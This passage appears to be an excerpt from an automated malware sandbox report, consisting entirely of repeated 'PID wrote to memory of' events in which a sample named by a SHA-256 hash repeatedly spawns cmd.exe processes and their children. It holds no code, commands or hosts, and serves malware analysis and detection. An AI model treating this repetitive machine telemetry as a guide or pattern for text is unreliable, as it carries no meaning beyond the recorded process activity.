wrote to memory of 1556 1584 cmd.exe 1134 PID 1584 wrote to memory of 1556 1584 cmd.exe 1134 PID 1584 wrote to memory of 1556 1584 cmd.exe 1134 PID 1556 wrote to memory of 1020 1556 cmd.exe 1135 PID 1556 wrote to memory of 1020 1556 cmd.exe 1135 PID 1556 wrote to memory of 1020 1556 cmd.exe 1135 PID 1556 wrote to memory of 1020 1556 cmd.exe 1135 PID 1584 wrote to memory of 1832 1584 cmd.exe 1136 PID 1584 wrote to memory of 1832 1584 cmd.exe 1136 PID 1584 wrote to memory of 1832 1584 cmd.exe 1136 PID 1584 wrote to memory of 1832 1584 cmd.exe 1136 PID 616 wrote to memory of 688 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1137 PID 616 wrote to memory of 688 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1137 PID 616 wrote to memory of 688 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1137 PID 616 wrote to memory of 688 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1137 PID 688 wrote to memory of 1188 688 cmd.exe 1139 PID 688 wrote to memory of 1188 688 cmd.exe 1139 PID 688 wrote to memory of 1188 688 cmd.exe 1139 PID 688 wrote to memory of 1188 688 cmd.exe 1139 PID 688 wrote to memory of 1176 688 cmd.exe 1140 PID 688 wrote to memory of 1176 688 cmd.exe 1140 PID 688 wrote to memory of 1176 688 cmd.exe 1140 PID 688 wrote to memory of 1176 688 cmd.exe 1140 PID 688 wrote to memory of 1472 688 cmd.exe 1141 PID 688 wrote to memory of 1472 688 cmd.exe 1141 PID 688 wrote to memory of 1472 688 cmd.exe 1141 PID 688 wrote to memory of 1472 688 cmd.exe 1141 PID 1472 wrote to memory of 1868 1472 cmd.exe 1142 PID 1472 wrote to memory of 1868 1472 cmd.exe 1142 PID 1472 wrote to memory of 1868 1472 cmd.exe 1142 PID 1472 wrote to memory of 1868 1472 cmd.exe 1142 PID 688 wrote to memory of 836 688 cmd.exe 1143 PID 688 wrote to memory of 836 688 cmd.exe 1143 PID 688 wrote to memory of 836 688 cmd.exe 1143 PID 688 wrote to memory of 836 688 cmd.exe 1143 PID 616 wrote to memory of 1120 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1144 PID 616 wrote to memory of 1120 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1144 PID 616 wrote to memory of 1120 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1144 PID 616 wrote to memory of 1120 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1144 PID 1120 wrote to memory of 884 1120 cmd.exe 1146 PID 1120 wrote to memory of 884 1120 cmd.exe 1146 PID 1120 wrote to memory of 884 1120 cmd.exe 1146 PID 1120 wrote to memory of 884 1120 cmd.exe 1146 PID 1120 wrote to memory of 1744 1120 cmd.exe 1147 PID 1120 wrote to memory of 1744 1120 cmd.exe 1147 PID 1120 wrote to memory of 1744 1120 cmd.exe 1147 PID 1120 wrote to memory of 1744 1120 cmd.exe 1147 PID 1120 wrote to memory of 1216 1120 cmd.exe 1148 PID 1120 wrote to memory of 1216 1120 cmd.exe 1148 PID 1120 wrote to memory of 1216 1120 cmd.exe 1148 PID 1120 wrote to memory of 1216 1120 cmd.exe 1148 PID 1216 wrote to memory of 1112 1216 cmd.exe 1149 PID 1216 wrote to memory of 1112 1216 cmd.exe 1149 PID 1216 wrote to memory of 1112 1216 cmd.exe 1149 PID 1216 wrote to memory of 1112 1216 cmd.exe 1149 PID 1120 wrote to memory of 1980 1120 cmd.exe 1150 PID 1120 wrote to memory of 1980 1120 cmd.exe 1150 PID 1120 wrote to memory of 1980 1120 cmd.exe 1150 PID 1120 wrote to memory of 1980 1120 cmd.exe 1150 PID 616 wrote to memory of 1756 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1151 PID 616 wrote to memory of 1756 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1151 PID 616 wrote to memory of 1756 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1151 PID 616 wrote to memory of 1756 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1151 PID 1756 wrote to memory of 888 1756 cmd.exe 1153 PID 1756 wrote to memory of 888 1756 cmd.exe 1153 PID 1756 wrote to memory of 888 1756 cmd.exe 1153 PID 1756 wrote to memory of 888 1756 cmd.exe 1153 PID 1756 wrote to memory of 220 1756 cmd.exe 1154 PID 1756 wrote to memory of 220 1756 cmd.exe 1154 PID 1756 wrote to memory of 220 1756 cmd.exe 1154 PID 1756 wrote to memory of 220 1756 cmd.exe 1154 PID 1756 wrote to memory of 964 1756 cmd.exe 1155 PID 1756 wrote to memory of 964 1756 cmd.exe 1155 PID 1756 wrote to memory of 964 1756 cmd.exe 1155 PID 1756 wrote to memory of 964 1756 cmd.exe 1155 PID 964 wrote to memory of 1340 964 cmd.exe 1156 PID 964 wrote to memory of 1340 964 cmd.exe 1156 PID 964 wrote to memory of 1340 964 cmd.exe 1156 PID 964 wrote to memory of 1340 964 cmd.exe 1156 PID 1756 wrote to memory of 1556 1756 cmd.exe 1157 PID 1756 wrote to memory of 1556 1756 cmd.exe 1157 PID 1756 wrote to memory of 1556 1756 cmd.exe 1157 PID 1756 wrote to memory of 1556 1756 cmd.exe 1157 PID 616 wrote to memory of 1944 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1158 PID 616 wrote to memory of 1944 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1158 PID 616 wrote to memory of 1944 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1158 PID 616 wrote to memory of 1944 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1158 PID 1944 wrote to memory of 1788 1944 cmd.exe 1160 PID 1944 wrote to memory of 1788 1944 cmd.exe 1160 PID 1944 wrote to memory of 1788 1944 cmd.exe 1160 PID 1944 wrote to memory of 1788 1944 cmd.exe 1160 PID 1944 wrote to memory of 1188 1944 cmd.exe 1161 PID 1944 wrote to memory of 1188 1944 cmd.exe 1161 PID 1944 wrote to memory of 1188 1944 cmd.exe 1161 PID 1944 wrote to memory of 1188 1944 cmd.exe 1161 PID 1944 wrote to memory of 1176 1944 cmd.exe 1162 PID 1944 wrote to memory of 1176 1944 cmd.exe 1162 PID 1944 wrote to memory of 1176 1944 cmd.exe 1162 PID 1944 wrote to memory of 1176 1944 cmd.exe 1162 PID 1176 wrote to memory of 2032 1176 cmd.exe 1163 PID 1176 wrote to memory of 2032 1176 cmd.exe 1163 PID 1176 wrote to memory of 2032 1176 cmd.exe 1163 PID 1176 wrote to memory of 2032 1176 cmd.exe 1163 PID 1944 wrote to memory of 1472 1944 cmd.exe 1164 PID 1944 wrote to memory of 1472 1944 cmd.exe 1164 PID 1944 wrote to memory of 1472 1944 cmd.exe 1164 PID 1944 wrote to memory of 1472 1944 cmd.exe 1164 PID 616 wrote to memory of 836 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1165 PID 616 wrote to memory of 836 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1165 PID 616 wrote to memory of 836 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1165 PID 616 wrote to memory of 836 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1165 PID 836 wrote to memory of 528 836 cmd.exe 1167 PID 836 wrote to memory of 528 836 cmd.exe 1167 PID 836 wrote to memory of 528 836 cmd.exe 1167 PID 836 wrote to memory of 528 836 cmd.exe 1167 PID 836 wrote to memory of 884 836 cmd.exe 1168 PID 836 wrote to memory of 884 836 cmd.exe 1168 PID 836 wrote to memory of 884 836 cmd.exe 1168 PID 836 wrote to memory of 884 836 cmd.exe 1168 PID 836 wrote to memory of 1744 836 cmd.exe 1169 PID 836 wrote to memory of 1744 836 cmd.exe 1169 PID 836 wrote to memory of 1744 836 cmd.exe 1169 PID 836 wrote to memory of 1744 836 cmd.exe 1169 PID 1744 wrote to memory of 1212 1744 cmd.exe 1170 PID 1744 wrote to memory of 1212 1744 cmd.exe 1170 PID 1744 wrote to memory of 1212 1744 cmd.exe 1170 PID 1744 wrote to memory of 1212 1744 cmd.exe 1170 PID 836 wrote to memory of 1216 836 cmd.exe 1171 PID 836 wrote to memory of 1216 836 cmd.exe 1171 PID 836 wrote to memory of 1216 836 cmd.exe 1171 PID 836 wrote to memory of 1216 836 cmd.exe 1171 PID 616 wrote to memory of 472 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1172 PID 616 wrote to memory of 472 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1172 PID 616 wrote to memory of 472 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1172 PID 616 wrote to memory of 472 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1172 PID 472 wrote to memory of 1152 472 cmd.exe 1174 PID 472 wrote to memory of 1152 472 cmd.exe 1174 PID 472 wrote to memory of 1152 472 cmd.exe 1174 PID 472 wrote to memory of 1152 472 cmd.exe 1174 PID 472 wrote to memory of 888 472 cmd.exe 1175 PID 472 wrote to memory of 888 472 cmd.exe 1175 PID 472 wrote to memory of 888 472 cmd.exe 1175 PID 472 wrote to memory of 888 472 cmd.exe 1175 PID 472 wrote to memory of 220 472 cmd.exe 1176 PID 472 wrote to memory of 220 472 cmd.exe 1176 PID 472 wrote to memory of 220 472 cmd.exe 1176 PID 472 wrote to memory of 220 472 cmd.exe 1176 PID 220 wrote to memory of 548 220 cmd.exe 1177 PID 220 wrote to memory of 548 220 cmd.exe 1177 PID 220 wrote to memory of 548 220 cmd.exe 1177 PID 220 wrote to memory of 548 220 cmd.exe 1177 PID 472 wrote to memory of 964 472 cmd.exe 1178 PID 472 wrote to memory of 964 472 cmd.exe 1178 PID 472 wrote to memory of 964 472 cmd.exe 1178 PID 472 wrote to memory of 964 472 cmd.exe 1178 PID 616 wrote to memory of 1556 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1179 PID 616 wrote to memory of 1556 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1179 PID 616 wrote to memory of 1556 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1179 PID 616 wrote to memory of 1556 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1179 PID 1556 wrote to memory of 232 1556 cmd.exe 1181 PID 1556 wrote to memory of 232 1556 cmd.exe 1181 PID 1556 wrote to memory of 232 1556 cmd.exe 1181 PID 1556 wrote to memory of 232 1556 cmd.exe 1181 PID 1556 wrote to memory of 1788 1556 cmd.exe 1182 PID 1556 wrote to memory of 1788 1556 cmd.exe 1182 PID 1556 wrote to memory of 1788 1556 cmd.exe 1182 PID 1556 wrote to memory of 1788 1556 cmd.exe 1182 PID 1556 wrote to memory of 1188 1556 cmd.exe 1183 PID 1556 wrote to memory of 1188 1556 cmd.exe 1183 PID 1556 wrote to memory of 1188 1556 cmd.exe 1183 PID 1556 wrote to memory of 1188 1556 cmd.exe 1183 PID 1188 wrote to memory of 1136 1188 cmd.exe 1184 PID 1188 wrote to memory of 1136 1188 cmd.exe 1184 PID 1188 wrote to memory of 1136 1188 cmd.exe 1184 PID 1188 wrote to memory of 1136 1188 cmd.exe 1184 PID 1556 wrote to memory of 1176 1556 cmd.exe 1185 PID 1556 wrote to memory of 1176 1556 cmd.exe 1185 PID 1556 wrote to memory of 1176 1556 cmd.exe 1185 PID 1556 wrote to memory of 1176 1556 cmd.exe 1185 PID 616 wrote to memory of 1472 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1186 PID 616 wrote to memory of 1472 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1186 PID 616 wrote to memory of 1472 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1186 PID 616 wrote to memory of 1472 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1186 PID 1472 wrote to memory of 1256 1472 cmd.exe 1188 PID 1472 wrote to memory of 1256 1472 cmd.exe 1188 PID 1472 wrote to memory of 1256 1472 cmd.exe 1188 PID 1472 wrote to memory of 1256 1472 cmd.exe 1188 PID 1472 wrote to memory of 528 1472 cmd.exe 1189 PID 1472 wrote to memory of 528 1472 cmd.exe 1189 PID 1472 wrote to memory of 528 1472 cmd.exe 1189 PID 1472 wrote to memory of 528 1472 cmd.exe 1189 PID 1472 wrote to memory of 884 1472 cmd.exe 1190 PID 1472 wrote to memory of 884 1472 cmd.exe 1190 PID 1472 wrote to memory of 884 1472 cmd.exe 1190 PID 1472 wrote to memory of 884 1472 cmd.exe 1190 PID 884 wrote to memory of 1112 884 cmd.exe 1191 PID 884 wrote to memory of 1112 884 cmd.exe 1191 PID 884 wrote to memory of 1112 884 cmd.exe 1191 PID 884 wrote to memory of 1112 884 cmd.exe 1191 PID 1472 wrote to memory of 1744 1472 cmd.exe 1192 PID 1472 wrote to memory of 1744 1472 cmd.exe 1192 PID 1472 wrote to memory of 1744 1472 cmd.exe 1192 PID 1472 wrote to memory of 1744 1472 cmd.exe 1192 PID 616 wrote to memory of 1216 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1193 PID 616 wrote to memory of 1216 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1193 PID 616 wrote to memory of 1216 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1193 PID 616 wrote to memory of 1216 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1193 PID 1216 wrote to memory of 1432 1216 cmd.exe 1195 PID 1216 wrote to memory of 1432 1216 cmd.exe 1195 PID 1216 wrote to memory of 1432 1216 cmd.exe 1195 PID 1216 wrote to memory of 1432 1216 cmd.exe 1195 PID 1216 wrote to memory of 1152 1216 cmd.exe 1196 PID 1216 wrote to memory of 1152 1216 cmd.exe 1196 PID 1216 wrote to memory of 1152 1216 cmd.exe 1196 PID 1216 wrote to memory of 1152 1216 cmd.exe 1196 PID 1216 wrote to memory of 888 1216 cmd.exe 1197 PID 1216 wrote to memory of 888 1216 cmd.exe 1197 PID 1216 wrote to memory of 888 1216 cmd.exe 1197 PID 1216 wrote to memory of 888 1216 cmd.exe 1197 PID 888 wrote to memory of 1340 888 cmd.exe 1198 PID 888 wrote to memory of 1340 888 cmd.exe 1198 PID 888 wrote to memory of 1340 888 cmd.exe 1198 PID 888 wrote to memory of 1340 888 cmd.exe 1198 PID 1216 wrote to memory of 220 1216 cmd.exe 1199 PID 1216 wrote to memory of 220 1216 cmd.exe 1199 PID 1216 wrote to memory of 220 1216 cmd.exe 1199 PID 1216 wrote to memory of 220 1216 cmd.exe 1199 PID 616 wrote to memory of 1488 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1200 PID 616 wrote to memory of 1488 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1200 PID 616 wrote to memory of 1488 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1200 PID 616 wrote to memory of 1488 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1200 PID 1488 wrote to memory of 2036 1488 cmd.exe 1202 PID 1488 wrote to memory of 2036 1488 cmd.exe 1202 PID 1488 wrote to memory of 2036 1488 cmd.exe 1202 PID 1488 wrote to memory of 2036 1488 cmd.exe 1202 PID 1488 wrote to memory of 232 1488 cmd.exe 1203 PID 1488 wrote to memory of 232 1488 cmd.exe 1203 PID 1488 wrote to memory of 232 1488 cmd.exe 1203 PID 1488 wrote to memory of 232 1488 cmd.exe 1203 PID 1488 wrote to memory of 1788 1488 cmd.exe 1204 PID 1488 wrote to memory of 1788 1488 cmd.exe 1204 PID 1488 wrote to memory of 1788 1488 cmd.exe 1204 PID 1488 wrote to memory of 1788 1488 cmd.exe 1204 PID 1788 wrote to memory of 2032 1788 cmd.exe 1205 PID 1788 wrote to memory of 2032 1788 cmd.exe 1205 PID 1788 wrote to memory of 2032 1788 cmd.exe 1205 PID 1788 wrote to memory of 2032 1788 cmd.exe 1205 PID 1488 wrote to memory of 1188 1488 cmd.exe 1206 PID 1488 wrote to memory of 1188 1488 cmd.exe 1206 PID 1488 wrote to memory of 1188 1488 cmd.exe 1206 PID 1488 wrote to memory of 1188 1488 cmd.exe 1206 PID 616 wrote to memory of 1176 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1207 PID 616 wrote to memory of 1176 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1207 PID 616 wrote to memory of 1176 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1207 PID 616 wrote to memory of 1176 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1207 PID 1176 wrote to memory of 1984 1176 cmd.exe 1209 PID 1176 wrote to memory of 1984 1176 cmd.exe 1209 PID 1176 wrote to memory of 1984 1176 cmd.exe 1209 PID 1176 wrote to memory of 1984 1176 cmd.exe 1209 PID 1176 wrote to memory of 1256 1176 cmd.exe 1210 PID 1176 wrote to memory of 1256 1176 cmd.exe 1210 PID 1176 wrote to memory of 1256 1176 cmd.exe 1210 PID 1176 wrote to memory of 1256 1176 cmd.exe 1210 PID 1176 wrote to memory of 528 1176 cmd.exe 1211 PID 1176 wrote to memory of 528 1176 cmd.exe 1211 PID 1176 wrote to memory of 528 1176 cmd.exe 1211 PID 1176 wrote to memory of 528 1176 cmd.exe 1211 PID 528 wrote to memory of 1476 528 cmd.exe 1212 PID 528 wrote to memory of 1476 528 cmd.exe 1212 PID 528 wrote to memory of 1476 528 cmd.exe 1212 PID 528 wrote to memory of 1476 528 cmd.exe 1212 PID 1176 wrote to memory of 884 1176 cmd.exe 1213 PID 1176 wrote to memory of 884 1176 cmd.exe 1213 PID 1176 wrote to memory of 884 1176 cmd.exe 1213 PID 1176 wrote to memory of 884 1176 cmd.exe 1213 PID 616 wrote to memory of 1200 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1214 PID 616 wrote to memory of 1200 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1214 PID 616 wrote to memory of 1200 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1214 PID 616 wrote to memory of 1200 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1214 PID 1200 wrote to memory of 1936 1200 cmd.exe 1216 PID 1200 wrote to memory of 1936 1200 cmd.exe 1216 PID 1200 wrote to memory of 1936 1200 cmd.exe 1216 PID 1200 wrote to memory of 1936 1200 cmd.exe 1216 PID 1200 wrote to memory of 1432 1200 cmd.exe 1217 PID 1200 wrote to memory of 1432 1200 cmd.exe 1217 PID 1200 wrote to memory of 1432 1200 cmd.exe 1217 PID 1200 wrote to memory of 1432 1200 cmd.exe 1217 PID 1200 wrote to memory of 1152 1200 cmd.exe 1218 PID 1200 wrote to memory of 1152 1200 cmd.exe 1218 PID 1200 wrote to memory of 1152 1200 cmd.exe 1218 PID 1200 wrote to memory of 1152 1200 cmd.exe 1218 PID 1152 wrote to memory of 548 1152 cmd.exe 1219 PID 1152 wrote to memory of 548 1152 cmd.exe 1219 PID 1152 wrote to memory of 548 1152 cmd.exe 1219 PID 1152 wrote to memory of 548 1152 cmd.exe 1219 PID 1200 wrote to memory of 1020 1200 cmd.exe 1220 PID 1200 wrote to memory of 1020 1200 cmd.exe 1220 PID 1200 wrote to memory of 1020 1200 cmd.exe 1220 PID 1200 wrote to memory of 1020 1200 cmd.exe 1220 PID 616 wrote to memory of 1832 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1221 PID 616 wrote to memory of 1832 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1221 PID 616 wrote to memory of 1832 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1221 PID 616 wrote to memory of 1832 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1221 PID 1832 wrote to memory of 472 1832 cmd.exe 1223 PID 1832 wrote to memory of 472 1832 cmd.exe 1223 PID 1832 wrote to memory of 472 1832 cmd.exe 1223 PID 1832 wrote to memory of 472 1832 cmd.exe 1223 PID 1832 wrote to memory of 1232 1832 cmd.exe 1224 PID 1832 wrote to memory of 1232 1832 cmd.exe 1224 PID 1832 wrote to memory of 1232 1832 cmd.exe 1224 PID 1832 wrote to memory of 1232 1832 cmd.exe 1224 PID 1832 wrote to memory of 1956 1832 cmd.exe 1225 PID 1832 wrote to memory of 1956 1832 cmd.exe 1225 PID 1832 wrote to memory of 1956 1832 cmd.exe 1225 PID 1832 wrote to memory of 1956 1832 cmd.exe 1225 PID 1956 wrote to memory of 1440 1956 cmd.exe 1226 PID 1956 wrote to memory of 1440 1956 cmd.exe 1226 PID 1956 wrote to memory of 1440 1956 cmd.exe 1226 PID 1956 wrote to memory of 1440 1956 cmd.exe 1226 PID 1832 wrote to memory of 1868 1832 cmd.exe 1227 PID 1832 wrote to memory of 1868 1832 cmd.exe 1227 PID 1832 wrote to memory of 1868 1832 cmd.exe 1227 PID 1832 wrote to memory of 1868 1832 cmd.exe 1227 PID 616 wrote to memory of 1828 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1228 PID 616 wrote to memory of 1828 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1228 PID 616 wrote to memory of 1828 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1228 PID 616 wrote to memory of 1828 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1228 PID 1828 wrote to memory of 1680 1828 cmd.exe 1230 PID 1828 wrote to memory of 1680 1828 cmd.exe 1230 PID 1828 wrote to memory of 1680 1828 cmd.exe 1230 PID 1828 wrote to memory of 1680 1828 cmd.exe 1230 PID 1828 wrote to memory of 1776 1828 cmd.exe 1231 PID 1828 wrote to memory of 1776 1828 cmd.exe 1231 PID 1828 wrote to memory of 1776 1828 cmd.exe 1231 PID 1828 wrote to memory of 1776 1828 cmd.exe 1231 PID 1828 wrote to memory of 1960 1828 cmd.exe 1232 PID 1828 wrote to memory of 1960 1828 cmd.exe 1232 PID 1828 wrote to memory of 1960 1828 cmd.exe 1232 PID 1828 wrote to memory of 1960 1828 cmd.exe 1232 PID 1960 wrote to memory of 660 1960 cmd.exe 1233 PID 1960 wrote to memory of 660 1960 cmd.exe 1233 PID 1960 wrote to memory of 660 1960 cmd.exe 1233 PID 1960 wrote to memory of 660 1960 cmd.exe 1233 PID 1828 wrote to memory of 368 1828 cmd.exe 1234 PID 1828 wrote to memory of 368 1828 cmd.exe 1234 PID 1828 wrote to memory of 368 1828 cmd.exe 1234 PID 1828 wrote to memory of 368 1828 cmd.exe 1234 PID 616 wrote to memory of 1864 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1235 PID 616 wrote to memory of 1864 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1235 PID 616 wrote to memory of 1864 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1235 PID 616 wrote to memory of 1864 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1235 PID 1864 wrote to memory of 1472 1864 cmd.exe 1237 PID 1864 wrote to memory of 1472 1864 cmd.exe 1237 PID 1864 wrote to memory of 1472 1864 cmd.exe 1237 PID 1864 wrote to memory of 1472 1864 cmd.exe 1237 PID 1864 wrote to memory of 228 1864 cmd.exe 1238 PID 1864 wrote to memory of 228 1864 cmd.exe 1238 PID 1864 wrote to memory of 228 1864 cmd.exe 1238 PID 1864 wrote to memory of 228 1864 cmd.exe 1238 PID 1864 wrote to memory of 224 1864 cmd.exe 1239 PID 1864 wrote to memory of 224 1864 cmd.exe 1239 PID 1864 wrote to memory of 224 1864 cmd.exe 1239 PID 1864 wrote to memory of 224 1864 cmd.exe 1239 PID 224 wrote to memory of 436 224 cmd.exe 1240 PID 224 wrote to memory of 436 224 cmd.exe 1240 PID 224 wrote to memory of 436 224 cmd.exe 1240 PID 224 wrote to memory of 436 224 cmd.exe 1240 PID 1864 wrote to memory of 860 1864 cmd.exe 1241 PID 1864 wrote to memory of 860 1864 cmd.exe 1241 PID 1864 wrote to memory of 860 1864 cmd.exe 1241 PID 1864 wrote to memory of 860 1864 cmd.exe 1241 PID 616 wrote to memory of 888 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1242 PID 616 wrote to memory of 888 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1242 PID 616 wrote to memory of 888 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1242 PID 616 wrote to memory of 888 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1242 PID 888 wrote to memory of 1576 888 cmd.exe 1244 PID 888 wrote to memory of 1576 888 cmd.exe 1244 PID 888 wrote to memory of 1576 888 cmd.exe 1244 PID 888 wrote to memory of 1576 888 cmd.exe 1244 PID 888 wrote to memory of 1120 888 cmd.exe 1245 PID 888 wrote to memory of 1120 888 cmd.exe 1245 PID 888 wrote to memory of 1120 888 cmd.exe 1245 PID 888 wrote to memory of 1120 888 cmd.exe 1245 PID 888 wrote to memory of 2036 888 cmd.exe 1246 PID 888 wrote to memory of 2036 888 cmd.exe 1246 PID 888 wrote to memory of 2036 888 cmd.exe 1246 PID 888 wrote to memory of 2036 888 cmd.exe 1246 PID 2036 wrote to memory of 360 2036 cmd.exe 1247 PID 2036 wrote to memory of 360 2036 cmd.exe 1247 PID 2036 wrote to memory of 360 2036 cmd.exe 1247 PID 2036 wrote to memory of 360 2036 cmd.exe 1247 PID 888 wrote to memory of 232 888 cmd.exe 1248 PID 888 wrote to memory of 232 888 cmd.exe 1248 PID 888 wrote to memory of 232 888 cmd.exe 1248 PID 888 wrote to memory of 232 888 cmd.exe 1248 PID 616 wrote to memory of 1788 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1249 PID 616 wrote to memory of 1788 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1249 PID 616 wrote to memory of 1788 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1249 PID 616 wrote to memory of 1788 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1249 PID 1788 wrote to memory of 672 1788 cmd.exe 1251 PID 1788 wrote to memory of 672 1788 cmd.exe 1251 PID 1788 wrote to memory of 672 1788 cmd.exe 1251 PID 1788 wrote to memory of 672 1788 cmd.exe 1251 PID 1788 wrote to memory of 1412 1788 cmd.exe 1252 PID 1788 wrote to memory of 1412 1788 cmd.exe 1252 PID 1788 wrote to memory of 1412 1788 cmd.exe 1252 PID 1788 wrote to memory of 1412 1788 cmd.exe 1252 PID 1788 wrote to memory of 1984 1788 cmd.exe 1253 PID 1788 wrote to memory of 1984 1788 cmd.exe 1253 PID 1788 wrote to memory of 1984 1788 cmd.exe 1253 PID 1788 wrote to memory of 1984 1788 cmd.exe 1253 PID 1984 wrote to memory of 1212 1984 cmd.exe 1254 PID 1984 wrote to memory of 1212 1984 cmd.exe 1254 PID 1984 wrote to memory of 1212 1984 cmd.exe 1254 PID 1984 wrote to memory of 1212 1984 cmd.exe 1254 PID 1788 wrote to memory of 1256 1788 cmd.exe 1255 PID 1788 wrote to memory of 1256 1788 cmd.exe 1255 PID 1788 wrote to memory of 1256 1788 cmd.exe 1255 PID 1788 wrote to memory of 1256 1788 cmd.exe 1255 PID 616 wrote to memory of 528 616 